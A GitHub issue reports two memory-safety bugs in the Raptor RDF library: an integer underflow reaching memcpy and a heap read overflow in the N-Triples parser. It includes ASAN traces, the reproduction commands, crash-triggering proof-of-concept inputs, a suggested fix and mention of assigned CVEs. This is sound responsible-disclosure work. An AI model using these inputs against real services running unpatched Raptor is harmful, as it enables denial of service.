Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Heap read overflow and integer overflow in memcpy #70

Open
pedrib opened this issue Dec 27, 2024 · 2 comments
Open

Heap read overflow and integer overflow in memcpy #70

pedrib opened this issue Dec 27, 2024 · 2 comments

Comments

@pedrib
Copy link

pedrib commented Dec 27, 2024

Hi,

I have reported these issues in the Debian bug tracker a few months ago:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067896

I've also pushed an update to my repo about them:
https://github.com/pedrib/PoC/blob/master/fuzzing/raptor-fuzz.md

Pasting here what I posted there:

1. Integer Underflow in raptor_uri_normalize_path()

There's an integer underflow in a path length calculation in
raptor_uri_normalize_path().

This can be triggered by running the PoC below:

utils/rapper -i turtle memcpy_int_underflow.poc
rapper: Parsing URI file:///memcpy_int_underflow.poc with parser turtle
rapper: Serializing with serializer ntriples
free(): invalid pointer
Aborted

With an ASAN build of rapper we can more clearly see the issue without
the need of a debugger:

raptor-asan/utils/rapper -i turtle memcpy_int_underflow.poc
rapper: Parsing URI file:///memcpy_int_underflow.poc with parser turtle
rapper: Serializing with serializer ntriples
=================================================================
==2406522==ERROR: AddressSanitizer: negative-size-param: (size=-5)
    #0 0x5f90a3e1cf33 in __interceptor_memcpy 
(/raptor/raptor-asan/utils/.libs/rapper+0x3cf33) (BuildId: 
31b11a035fdbbfb23ddb7c1a5db60302956622be)
    #1 0x7c902fa96e5a in raptor_uri_resolve_uri_reference 
(/raptor/raptor/src/.libs/libraptor2.so.0+0x19e5a) (BuildId: 
9edf75a105deaf007b9332b0a0367c8ad4af744d)
    #2 0x7c902fa9741c in raptor_new_uri_relative_to_base_counted 
(/raptor/raptor/src/.libs/libraptor2.so.0+0x1a41c) (BuildId: 
9edf75a105deaf007b9332b0a0367c8ad4af744d)
    #3 0x7c902fa9747a in raptor_new_uri_relative_to_base 
(/raptor/raptor/src/.libs/libraptor2.so.0+0x1a47a) (BuildId: 
9edf75a105deaf007b9332b0a0367c8ad4af744d)
    #4 0x7c902fab93fc in turtle_lexer_lex 
(/raptor/raptor/src/.libs/libraptor2.so.0+0x3c3fc) (BuildId: 
9edf75a105deaf007b9332b0a0367c8ad4af744d)
    #5 0x7c902fabc3ec in turtle_parser_parse 
(/raptor/raptor/src/.libs/libraptor2.so.0+0x3f3ec) (BuildId: 
9edf75a105deaf007b9332b0a0367c8ad4af744d)
    #6 0x7c902fabebb9 in turtle_parse turtle_parser.c
    #7 0x7c902fabf3ff in raptor_turtle_parse_chunk turtle_parser.c
    #8 0x7c902fa92de4 in raptor_parser_parse_chunk 
(/raptor/raptor/src/.libs/libraptor2.so.0+0x15de4) (BuildId: 
9edf75a105deaf007b9332b0a0367c8ad4af744d)
    #9 0x7c902fa92fc1 in raptor_parser_parse_file_stream 
(/raptor/raptor/src/.libs/libraptor2.so.0+0x15fc1) (BuildId: 
9edf75a105deaf007b9332b0a0367c8ad4af744d)
    #10 0x7c902fa93174 in raptor_parser_parse_file 
(/raptor/raptor/src/.libs/libraptor2.so.0+0x16174) (BuildId: 
9edf75a105deaf007b9332b0a0367c8ad4af744d)
    #11 0x5f90a3ed9492 in main 
(/raptor/raptor-asan/utils/.libs/rapper+0xf9492) (BuildId: 
31b11a035fdbbfb23ddb7c1a5db60302956622be)
    #12 0x7c902f7816c9 in __libc_start_call_main 
csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #13 0x7c902f781784 in __libc_start_main csu/../csu/libc-start.c:360:3
    #14 0x5f90a3e01650 in _start 
(/raptor/raptor-asan/utils/.libs/rapper+0x21650) (BuildId: 
31b11a035fdbbfb23ddb7c1a5db60302956622be)

(...)

SUMMARY: AddressSanitizer: negative-size-param 
(/raptor/raptor-asan/utils/.libs/rapper+0x3cf33) (BuildId: 
31b11a035fdbbfb23ddb7c1a5db60302956622be) in __interceptor_memcpy
==2406522==ABORTING

The crash occurs because raptor_uri_normalize_path(), which does some
complicated jiggling to normalize paths, and fails to take into account
integer underflows. The function will not be shown here as it is quite
complex.

The fix, however, is rather simple!
The function contains several of these checks after each calculation:

#if defined(RAPTOR_DEBUG)
  if(path_len != strlen((const char*)path_buffer))
    RAPTOR_FATAL3("Path length %ld does not match calculated %ld.", 
(long)strlen((const char*)path_buffer), (long)path_len);
#endif

By removing the ifdefs around the RAPTOR_FATAL calls, we can catch
prevent this bug, as running the PoC results in:
raptor_rfc2396.c:399:raptor_uri_normalize_path: fatal error: Path length 0 does not match calculated -5.Aborted

1.1 Steps to reproduce

rapper -i turtle memcpy_int_underflow.poc

Contents of memcpy_int_underflow.poc:

@base <http:o/www.w3.org/2001/sw/DataA#cess/df1.ttl> .
@prefix bdf: <.&/../?D/../../1999/02/22-rdf-syntax-ns#>/dbpe

2. Heap read buffer overflow in raptor_ntriples_parse_term_internal()

Sorry didn't have much time to analyse this, here's the full ASAN output:

raptor-asan/utils/rapper -i nquads heap_read_overflow.poc
rapper: Parsing URI file:///heap_read_overflow.poc with parser nquads
rapper: Serializing with serializer ntriples
=================================================================
==2449874==ERROR: AddressSanitizer: heap-buffer-overflow on address 
0x602000004d6f at pc 0x70f0eec00a68 bp 0x7ffecb914e50 sp 0x7ffecb914e48
READ of size 1 at 0x602000004d6f thread T0
    #0 0x70f0eec00a67 in raptor_ntriples_parse_term_internal 
raptor_ntriples.c
    #1 0x70f0eebfffc8 in raptor_ntriples_parse_term 
(/raptor-asan/src/.libs/libraptor2.so.0+0x8cfc8) (BuildId: 
2591e3251613881bd804fabbc6c02dd6e7b7b76e)
    #2 0x70f0eec37fa1 in raptor_ntriples_parse_line ntriples_parse.c
    #3 0x70f0eec36782 in raptor_ntriples_parse_chunk ntriples_parse.c
    #4 0x70f0eeba9486 in raptor_parser_parse_chunk 
(/raptor-asan/src/.libs/libraptor2.so.0+0x36486) (BuildId: 
2591e3251613881bd804fabbc6c02dd6e7b7b76e)
    #5 0x70f0eeba96b6 in raptor_parser_parse_file_stream 
(/raptor-asan/src/.libs/libraptor2.so.0+0x366b6) (BuildId: 
2591e3251613881bd804fabbc6c02dd6e7b7b76e)
    #6 0x70f0eeba9aac in raptor_parser_parse_file 
(/raptor-asan/src/.libs/libraptor2.so.0+0x36aac) (BuildId: 
2591e3251613881bd804fabbc6c02dd6e7b7b76e)
    #7 0x5f25d7d8e492 in main (/raptor-asan/utils/.libs/rapper+0xf9492) 
(BuildId: 31b11a035fdbbfb23ddb7c1a5db60302956622be)
    #8 0x70f0ee8776c9 in __libc_start_call_main 
csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #9 0x70f0ee877784 in __libc_start_main csu/../csu/libc-start.c:360:3
    #10 0x5f25d7cb6650 in _start 
(/raptor-asan/utils/.libs/rapper+0x21650) (BuildId: 
31b11a035fdbbfb23ddb7c1a5db60302956622be)

0x602000004d6f is located 1 bytes before 16-byte region 
[0x602000004d70,0x602000004d80)
allocated by thread T0 here:
    #0 0x5f25d7d5047e in malloc 
(/raptor-asan/utils/.libs/rapper+0xbb47e) (BuildId: 
31b11a035fdbbfb23ddb7c1a5db60302956622be)
    #1 0x70f0eec35c4b in raptor_ntriples_parse_chunk ntriples_parse.c
    #2 0x70f0eeba9486 in raptor_parser_parse_chunk 
(/raptor-asan/src/.libs/libraptor2.so.0+0x36486) (BuildId: 
2591e3251613881bd804fabbc6c02dd6e7b7b76e)
    #3 0x70f0eeba96b6 in raptor_parser_parse_file_stream 
(/raptor-asan/src/.libs/libraptor2.so.0+0x366b6) (BuildId: 
2591e3251613881bd804fabbc6c02dd6e7b7b76e)
    #4 0x70f0eeba9aac in raptor_parser_parse_file 
(/raptor-asan/src/.libs/libraptor2.so.0+0x36aac) (BuildId: 
2591e3251613881bd804fabbc6c02dd6e7b7b76e)
    #5 0x5f25d7d8e492 in main (/raptor-asan/utils/.libs/rapper+0xf9492) 
(BuildId: 31b11a035fdbbfb23ddb7c1a5db60302956622be)
    #6 0x70f0ee8776c9 in __libc_start_call_main 
csu/../sysdeps/nptl/libc_start_call_main.h:58:16

SUMMARY: AddressSanitizer: heap-buffer-overflow raptor_ntriples.c in 
raptor_ntriples_parse_term_internal
Shadow bytes around the buggy address:
  0x602000004a80: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
  0x602000004b00: fa fa fd fd fa fa fd fd fa fa fd fd fa fa 00 00
  0x602000004b80: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa
  0x602000004c00: fa fa 00 00 fa fa 00 fa fa fa 06 fa fa fa 00 01
  0x602000004c80: fa fa 00 01 fa fa 07 fa fa fa 00 03 fa fa 06 fa
=>0x602000004d00: fa fa 00 01 fa fa 05 fa fa fa 04 fa fa[fa]00 00
  0x602000004d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x602000004e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x602000004e80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x602000004f00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x602000004f80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==2449874==ABORTING

2.1 Steps to reproduce

rapper -i nquads heap_read_overflow.poc

Contents of heap_read_overflow.poc:

_:/exaple/o
@carnil
Copy link

carnil commented Jan 11, 2025

Two CVEs were assigned for these issues: CVE-2024-57822 and CVE-2024-57823

@dajobe
Copy link
Owner

dajobe commented Jan 16, 2025

Thanks for reporting here with small examples that trigger it.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@dajobe @carnil @pedrib